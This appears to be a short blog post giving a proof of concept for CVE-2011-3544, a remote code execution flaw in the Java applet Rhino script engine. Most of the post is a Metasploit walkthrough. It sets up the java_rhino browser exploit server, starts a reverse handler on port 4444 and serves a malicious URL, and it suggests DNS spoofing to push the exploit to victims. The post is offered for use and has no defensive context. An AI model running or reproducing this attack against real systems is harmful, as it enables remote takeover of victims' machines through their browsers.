(video) CVE-2011-3544 / ZDI-11-305 – Oracle Java Applet Rhino Script Engine Remote Code Execution

AUTHORS :   
   
Michael Schierl < >
juan vazquez < >
Edward D. Teach < teach [at] consortium-of-pwners.net >
sinn3r < sinn3r [at] metasploit.com >

Description :

Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27
and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect
confidentiality, integrity, and availability via unknown vectors related to Scripting.

more info :
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-3544

POC :
make sure the apache server is off
do you can DNS spoofing to send exploit

msf > use exploit/multi/browser/java_rhino

msf  exploit(java_rhino) > set srvhost [ip local]
srvhost => 192.168.1.x
msf  exploit(java_rhino) > set srvport 80
srvport => 80
msf  exploit(java_rhino) > set uripath /

msf  exploit(java_rhino) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.4:4444
[*] Using URL: http://192.168.1.4:80/
[*] Server started.

video by me : http://www.4shared.com/archive/7_UAo__I/java_rhino_yur4kh4tar.html
format file : *.tar.gz


ragards+contact : yur4kh4

Search Post

Label :